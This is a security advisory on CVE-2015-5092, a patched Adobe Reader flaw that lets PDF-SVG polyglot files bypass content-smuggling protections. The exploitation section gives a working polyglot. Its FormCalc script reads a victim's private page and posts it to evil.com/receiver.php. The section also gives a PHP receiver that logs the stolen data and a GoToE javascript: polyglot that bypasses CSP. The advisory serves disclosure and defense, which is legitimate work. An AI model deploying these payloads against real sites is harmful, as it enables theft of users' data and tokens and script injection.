PDF-based polyglots through SVG images

Target product: Adobe Reader

Researcher: Mauro Gentile

PDF-SVG polyglots in Adobe Reader

Summary

1 PDF-BASED POLYGLOTS THROUGH SVG IMAGES

1.1.1 Description

1.1.2 Exploitation scenario

1.1.3 Impact

1.1.4 Polyglots related to XSS and Content Security Policy

1.1.5 References

1 PDF-based polyglots through SVG images

The vulnerability described in this report was responsibly reported to Adobe on April 21, 2015.

Adobe released a patch on July 14, 2015 (APSB15-15: https://helpx.adobe.com/security/products/reader/apsb15-15.html) and assigned CVE-2015-5092 to this security issue.

1.1.1 Description

The “PDF Content Smuggling” concept was introduced by Magazinius, Rios and Sabelfeld in the academic paper “Polyglots: Crossing Origins by Crossing Formats” [1, 2]. The technique uses PDF-based polyglots (i.e. files which are both PDF documents and images) to perform same-origin request forgery, with the aim of exfiltrating private data in the context of a target domain [3, 4].

Adobe patched this issue by comparing the first bytes of the PDF document against a set of known file signatures: if a match is found, the parser aborts loading the document. Such an approach has some intrinsic weaknesses:

1. A blacklist of known file signatures can be bypassed with any file format that is not on the list.

2. Any file format whose signature may appear beyond offset 0 would still allow PDF-based polyglots.

However, no widespread image format is allowed to start beyond offset 0 [5, 6], and the signatures of popular formats are blacklisted. PDF-based polyglots are therefore no longer possible when the benign format is a common image, unless a format exists that leaves some degree of freedom with respect to the “signature bytes”.

These considerations lead to PDF-SVG polyglots, since the SVG format is quite tolerant with respect to the “signature bytes”¹.

Adobe also took SVG images into consideration and made the following choices² when addressing the content smuggling issue:

“<?xml” at offset 0 is blacklisted

“<svg” at offset 0 is blacklisted

“<!DOCTYPE” at offset 0 is not blacklisted

¹ Strictly speaking, it is not appropriate to talk about “signature bytes” for the SVG format.

² Test results refer to Adobe Reader version 11.0.11; changes were applied in version 11.0.12 to address the vulnerability described here.

Inserting whitespace and/or newlines before “<?xml” or “<svg” does not bypass the patch. Putting any other character before these two blacklisted signatures does bypass it, but the resulting SVG file is then no longer syntactically well-formed.
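The observed behaviour can be summarised with a small model. The following Python sketch is only an approximation built from the test results above: Adobe's actual implementation is not public, and the names `BLACKLISTED_PREFIXES`, `is_rejected` and `SAMPLES` are hypothetical. It assumes that leading whitespace is skipped before the comparison, and it covers only the two SVG-related signatures.

```python
# Hypothetical model of the offset-0 blacklist, reconstructed from the test
# results reported in the text. This is NOT Adobe's code; names are invented.
BLACKLISTED_PREFIXES = (b"<?xml", b"<svg")


def is_rejected(data: bytes) -> bool:
    """Return True if the modelled check would refuse to load the file."""
    # Whitespace and newlines before the signature did not bypass the patch,
    # so the model skips them before comparing.
    stripped = data.lstrip(b" \t\r\n")
    return stripped.startswith(BLACKLISTED_PREFIXES)


SAMPLES = {
    "xml declaration": b'<?xml version="1.0"?><svg/>',
    "svg root": b"<svg/>",
    "whitespace + svg": b"\n  <svg/>",
    "comment": b"<!----><svg/>",
    "dummy tag": b"<i><svg/></i>",
    "processing instruction": b"<?h ?><svg/>",
    "doctype": b"<!DOCTYPE svg><svg/>",
}

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:24} rejected={is_rejected(sample)}")
```

In this model only the first three samples are rejected. The remaining ones start with bytes that are not on the list yet still form well-formed XML.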

Nevertheless, valid PDF-SVG polyglots, which are read correctly both by Adobe Reader and by SVG interpreters, do exist, as the following cases show.

1) Comment at offset 0

<!---->

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

<!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->

2) Dummy tag at offset 0

<i>

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

</i> <!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->

3) Tag "<?dummy" at offset 0

<?h ?>

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

<!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->

4) <!DOCTYPE at offset 0

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"

"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

<!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->

5) SVG in PDF comment

<!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

%--><svg xmlns="http://www.w3.org/2000/svg" version="1.1"><circle r="100" fill="blue"

/></svg><!--

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->
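The two properties that make these files polyglots can be checked mechanically: the file must be well-formed XML, and the PDF header must sit close enough to the start of the file for the PDF parser to find it. The sketch below is an illustration using only the Python standard library; `build_polyglot` and `inspect_polyglot` are hypothetical helper names. The 1024-byte window reflects the leniency documented in the implementation notes of Adobe's PDF Reference and is an assumption here, not something measured in this report.

```python
import xml.etree.ElementTree as ET

SVG_BODY = (
    b'<svg xmlns="http://www.w3.org/2000/svg" version="1.1">\n'
    b'<circle r="100" fill="blue" />\n'
    b"</svg>\n"
)

# Minimal PDF copied from the cases above.
PDF_BODY = (
    b"%PDF-1.\n"
    b"1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>"
    b"2 0 obj<<>>stream\n"
    b"BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET\n"
    b"endstream\n"
    b"endobj\n"
    b"trailer<</Root<</Pages 1 0 R>>>>"
)


def build_polyglot(prefix: bytes) -> bytes:
    """Prefix, then the SVG image, then the PDF wrapped in an XML comment."""
    return prefix + b"\n" + SVG_BODY + b"<!--" + PDF_BODY + b"-->"


def inspect_polyglot(data: bytes):
    """Return (root tag, offset of the PDF header).

    ET.fromstring raises xml.etree.ElementTree.ParseError if the data is
    not well-formed XML.
    """
    root = ET.fromstring(data)
    return root.tag, data.find(b"%PDF-")


if __name__ == "__main__":
    # Prefixes of cases 1, 3 and 4 (the DOCTYPE is shortened here).
    for prefix in (b"<!---->", b"<?h ?>", b"<!DOCTYPE svg>"):
        tag, offset = inspect_polyglot(build_polyglot(prefix))
        print(prefix, tag, "PDF header at offset", offset)
```

The check only shows that a generic XML parser accepts the file; it says nothing about how a specific browser or a specific Adobe Reader version treats it.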

1.1.2 Exploitation scenario

Let us assume that a web application hosted on example.com allows users to upload SVG images. Once the attacker has uploaded a malicious PDF-SVG polyglot to example.com and has lured the victim into visiting http://evil.com/test.html, the attacker can steal the victim's private information as well as anti-CSRF tokens.

The data is accessed by having the PDF file trigger same-origin HTTP requests [7, 8, 9] through the FormCalc APIs.

Note that if the target web application allows PDF uploads, the technique is unnecessary: uploading a genuine PDF file instead of a polyglot would lead to the same result, unless some filtering is in place for that file format.

http://example.com/files/user_uploaded.svg

<!DOCTYPE svg>

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

<!--

%PDF-1.

1 0 obj <<>>

stream

<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">

<config><present><pdf><interactive>1</interactive></pdf></present></config>

<template>

<subform name="_">

<pageSet/>

<field id="Hello World!">

<event activity="initialize">

<script contentType='application/x-formcalc'>

var content = Get("http://example.com/privatedata.php");

Post("http://evil.com/receiver.php",content);

</script>

</event>

</field>

</subform>

</template>

</xdp:xdp>

endstream

endobj

trailer <<

/Root <<

/AcroForm <<

/Fields [<<

/T (0)

/Kids [<<

/Subtype /Widget

/Rect []

/T ()

/FT /Btn

>>]

>>]

/XFA 1 0 R

>>

/Pages <<>>

>>

>>

-->

http://example.com/privatedata.php

<?php

session_start();

if (isset($_SESSION['user'])) {

echo "PRIVATEDATA...";

} else {

echo "nothing";

}

?>

http://evil.com/test.html

<img src="http://example.com/files/user_uploaded.svg" />

<object data="http://example.com/files/user_uploaded.svg"

type="application/pdf"

width="350"

height="200" />

http://evil.com/crossdomain.xml

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>

<allow-access-from domain="*"/>

</cross-domain-policy>

http://evil.com/receiver.php

<?php

if ($_SERVER['REQUEST_METHOD'] === 'POST') {

$data = file_get_contents('php://input')."\n";

$ret = file_put_contents('/tmp/data.txt', $data, FILE_APPEND | LOCK_EX);

}

?>

Attack flow

The attack flow is reported below.

1. The victim logs in to http://example.com/

2. The victim is asked to visit http://evil.com/test.html

3. The PDF polyglot steals the victim’s private data and sends it to http://evil.com/receiver.php

Testing environment

The polyglots shown above were tested successfully in the following environments:

1. Windows 7, Adobe Reader plug-in 11.0.11.18, on Mozilla Firefox 39.0, in which we set “Preview in Firefox with Adobe Reader” for the PDF file format.

2. Windows 7, Adobe Reader plug-in 11.0.11.18, on Opera 30.0, in which we disabled the “Chrome PDF viewer”.

3. Windows 7, Adobe Reader plug-in 11.0.11.18, on Google Chrome 44.0.2403.107, in which we disabled the “Chrome PDF viewer”, and enabled the Adobe Reader plug-in.

Note that PDF polyglots do not work in Internet Explorer since it downloads them and opens a local copy.

In addition, default installations of Firefox, Chrome and Opera do not use Adobe Reader to render PDF files; the potentially affected users are therefore those who changed their browser settings to use Adobe Reader instead of the default built-in reader.

1.1.3 Impact

Allowing users to upload SVG files can be considered as dangerous as allowing them to upload HTML files, since both can be used to trigger XSS attacks; for details, refer to the research carried out by Heiderich [10, 11, 12].

Modern web applications, however, usually filter uploaded SVG files in order to detect tags and/or attributes whose purpose is to execute JavaScript.

Even when the XSS (SVG) filters are strict enough to block any bypass attempt, the aforementioned polyglots still leave the target web application vulnerable to same-origin request forgery and content hijacking, because the PDF content is seen as a comment by the SVG filtering procedure³.
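The opposite case, a filter that discards comments, can be illustrated with a short Python sketch. It is a hypothetical example and not a filter taken from any real application: `POLYGLOT` is a shortened stand-in for the polyglots shown earlier, and `reserialize_without_comments` is an invented name. It relies on the fact that the default `xml.etree.ElementTree` parser does not keep comments, so re-serializing the parsed tree drops the PDF payload.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Shortened stand-in for a PDF-SVG polyglot (the PDF part is abbreviated).
POLYGLOT = (
    b"<!DOCTYPE svg>\n"
    b'<svg xmlns="http://www.w3.org/2000/svg" version="1.1">\n'
    b'<circle r="100" fill="blue" />\n'
    b"</svg>\n"
    b"<!--%PDF-1.\n1 0 obj<<>>\nendobj\ntrailer<</Root<<>>>>-->"
)


def reserialize_without_comments(svg_bytes: bytes) -> bytes:
    """Parse the upload and write back only the element tree."""
    # Keep the SVG namespace as the default namespace in the output.
    ET.register_namespace("", SVG_NS)
    # The default parser ignores comments (and the DOCTYPE), so they are
    # absent from the tree that is serialized below.
    root = ET.fromstring(svg_bytes)
    return ET.tostring(root)


if __name__ == "__main__":
    cleaned = reserialize_without_comments(POLYGLOT)
    print(b"%PDF-" in POLYGLOT, b"%PDF-" in cleaned)
```

A filter that only inspects tags and attributes and then stores the original bytes keeps the comment, and with it the PDF. Note also that the standard-library XML parsers are not hardened against maliciously constructed input, so a production filter would need additional care.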

For further reading on polyglots and PDF-related resources, refer to [13, 14, 15, 16, 17, 18, 19].

1.1.4 Polyglots related to XSS and Content Security Policy

Although much research has been carried out in recent years, Inführ recently presented an interesting case of Cross-Site Scripting triggered through PDF files [7, 20].

Basically, it was possible to execute JavaScript code in the context of a target domain by uploading malicious PDF files; the execution took place by abusing the GoToE action.

By combining the PDF-based polyglot issue with this XSS problem, we can craft a malicious SVG (PDF) image that contains an HTML document which embeds the file itself, causing arbitrary JavaScript code to be executed.

The following PDF-based polyglot illustrates the idea:

<!DOCTYPE svg>

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

<foreignObject>

<body xmlns="http://www.w3.org/1999/xhtml">

<embed src="#" type="application/pdf"></embed>

</body>

</foreignObject>

</svg>

<!--

%PDF-1.1

1 0 obj

<<

/Pages 2 0 R

/OpenAction 4 0 R

>>

endobj

2 0 obj

<<

/Type /Pages

/Kids [3 0 R]

>>

endobj

3 0 obj

<<

/Type /Page

/Parent 2 0 R

>>

endobj

4 0 obj

<<

/Type /Action

/S /GoToE /F (javascript:alert(document.domain))

>>

endobj

trailer

<<

/Root 1 0 R

>>

-->

³ Note that filters which discard comments and CDATA sections remove the PDF content from the resulting SVG image; in that case, PDF-SVG polyglots obviously cannot exist.

The reported polyglot is particularly interesting, since it leads to a Content Security Policy bypass in Blink-based browsers⁴.

If the target web application uses the CSP shown below, the assumption that JavaScript execution cannot take place no longer holds, unless the victim is using a patched version⁵ of Adobe Reader.

Content-Security-Policy: default-src 'self'; script-src 'none';

Visiting the SVG file reported above causes document.domain to be alerted.

Under these conditions, the combination of the polyglots and the XSS bug becomes quite useful for attacking web applications that allow SVG uploads (but prohibit genuine PDF uploads) and rely only on CSP for protection against XSS.

Although this approach raises the overall impact of the vulnerability, allowing foreignObject tags in uploaded SVG files is by itself sufficient to make an application vulnerable to stored XSS; the presented attack is therefore relevant when XSS protection is achieved through CSP only.

⁴ Tested in Google Chrome 44.0.2403.107 and Opera 30.0, with Adobe Reader plug-in 11.0.11.18 enabled in place of Chrome PDF viewer.

⁵ Both XSS through GoToE and the SVG-related content smuggling issue have been patched in Adobe Reader 11.0.12.

For the sake of completeness, the relationship between SVG images and CSP was described exhaustively by deGraaf [21].

The use of polyglots to bypass CSP was previously discussed by Heiderich in a scenario in which HTML Imports were abused to load a malicious same-origin GIF image [22, 23]. Setting default-src to ‘self’ places broad trust in the same origin; the ability to upload polyglots to that origin can therefore make the CSP protection useless, unless the application restricts the specific policy directives involved.
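The effect of default-src can be made concrete with a small Python sketch. It is a simplified illustration, not a full CSP parser; `parse_csp` and `effective_sources` are hypothetical names. It assumes the standard CSP behaviour that a fetch directive missing from the policy falls back to default-src, and that content loaded through embed and object elements is governed by object-src.

```python
def parse_csp(header_value: str) -> dict:
    """Split a CSP header value into {directive name: source list}."""
    policy = {}
    for part in header_value.split(";"):
        tokens = part.split()
        if tokens:
            # The first token is the directive name, the rest are its sources.
            # If a directive is repeated, the first occurrence wins.
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def effective_sources(policy: dict, directive: str):
    """Source list applied to a fetch directive, with default-src fallback."""
    return policy.get(directive, policy.get("default-src"))


# Policy used in the scenario described earlier in this section.
POLICY = parse_csp("default-src 'self'; script-src 'none';")

# Hypothetical variant that restricts one more specific directive.
HARDENED = parse_csp("default-src 'self'; script-src 'none'; object-src 'none';")

if __name__ == "__main__":
    print("script-src:", effective_sources(POLICY, "script-src"))
    print("object-src:", effective_sources(POLICY, "object-src"))
    print("object-src (variant):", effective_sources(HARDENED, "object-src"))
```

With the original policy, scripts are blocked but plugin content from the same origin is still allowed, which is what the embedded polyglot relies on. The variant with object-src 'none' is only one example of restricting a specific directive; it was not part of the tests described in this report.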

More generally, the problem also involves external trusted domains; for instance, embedding scripts from a domain that accepts SWF uploads would still make the CSP protection useless [24].

Finally, curious readers may be interested in some other CSP bypass techniques by Kouzemtchenko [25].

Notes:

1. The minimal PDF file was taken from: https://code.google.com/p/corkami/wiki/PDFTricks#Minimalists_PDF

2. The PDF template file, using FormCalc, was taken from the Cross-Site Content Hijacking proofs of concept by Soroush Dalili of NCC Group: https://github.com/nccgroup/CrossSiteContentHijacking/blob/master/ContentHijacking/objects/xfa-manual-ContentHijacking.pdf

1.1.5 References

[1] "Polyglots: Crossing Origins by Crossing Formats", Jonas Magazinius, Billy K. Rios, Andrei Sabelfeld - http://www.cse.chalmers.se/~andrei/ccs13.pdf

[2] "Content Smuggling", Billy K. Rios - http://xs-sniper.com/blog/2012/10/11/content-smuggling/

[3] "Crossing Origins by Crossing Formats", Jonas Magazinius - http://www.slideshare.net/internot/crossing-origins-by-crossing-formats

[4] "Crossing Origins by Crossing Formats", Jonas Magazinius - https://www.owasp.org/images/8/85/Crossing.Origins.by.Crossing.Formats-Jonas.Magazinius-OWASP-131010.pptx

[5] "Corkamix", Ange Albertini - https://code.google.com/p/corkami/wiki/mix?show=content

[6] "Messing with binary formats", Ange Albertini - http://www.slideshare.net/ange4771/messing-with-binary-formats

[7] "Multiple PDF Vulnerabilities - Text and Pictures on Steroids", Alex Inführ - http://insert-script.blogspot.co.at/2014/12/multiple-pdf-vulnerabilites-text-and.html

[8] "Cross-Site Content Hijacking (XSCH) PoC", Soroush Dalili - https://github.com/nccgroup/CrossSiteContentHijacking

[9] "SDRF vulns in webapps and browsers", Vladimir Vorontsov - http://seclists.org/fulldisclosure/2010/Aug/236

[10] "HTML5 Security Cheatsheet - Vectors embedded in SVG files", Mario Heiderich - http://html5sec.org/#svg

[11] "The Image that called me", Mario Heiderich - http://www.slideshare.net/x00mario/the-image-that-called-me

[12] "Crouching Tiger - Hidden Payload: Security Risks of Scalable Vectors Graphics", Mario Heiderich, Tilman Frosch, Meiko Jensen, Thorsten Holz - http://www.hgi.ruhr-uni-bochum.de/media/hgi/veroeffentlichungen/2011/10/19/svgSecurity-ccs11.pdf

[13] "Hello, squirrel fans!", Michal Zalewski - http://lcamtuf.coredump.cx/squirrel/

[14] "Deadly Pixels", Saumil Shah - http://www.slideshare.net/saumilshah/deadly-pixels-nsc-2013

[15] "Valid pictures with useable JavaScript", Ange Albertini - https://code.google.com/p/corkami/downloads/detail?name=jspics.zip&can=2&q=

[16] "OMG-WTF-PDF", Julia Wolf - http://www.troopers.de/wp-content/uploads/2011/04/TR11_Wolf_OMG_PDF.pdf

[17] "Advanced PDF Tricks", Ange Albertini - https://speakerdeck.com/ange/advanced-pdf-tricks

[18] "Funky File Formats", Ange Albertini - https://speakerdeck.com/ange/funky-file-formats-31c3

[19] "Polyglot payloads in practice", Mathias Karlsson - http://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra

[20] "PDF - Mess with the web", Alex Inführ - http://insert-script.blogspot.co.at/2015/05/pdf-mess-with-web.html

[21] "SVG: Exploiting Browsers Without Image Parsing Bugs", Rennie deGraaf - https://www.blackhat.com/docs/us-14/materials/us-14-DeGraaf-SVG-Exploiting-Browsers-Without-Image-Parsing-Bugs.pdf

[22] "CSP Bypass in Chrome Canary + AngularJS", Mario Heiderich - https://html5sec.org/cspbypass/

[23] "JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks", Mario Heiderich - http://www.slideshare.net/x00mario/jsmvcomfg-to-sternly-look-at-javascript-mvc-and-templating-frameworks

[24] "Building an XSS polyglot through SWF and CSP", Frans Rosén - http://labs.detectify.com/post/120088174539/building-an-xss-polyglot-through-swf-and-csp

[25] "Bypassing Content Security Policy", Alex Kouzemtchenko - https://www.youtube.com/watch?v=LA9S9I4Co00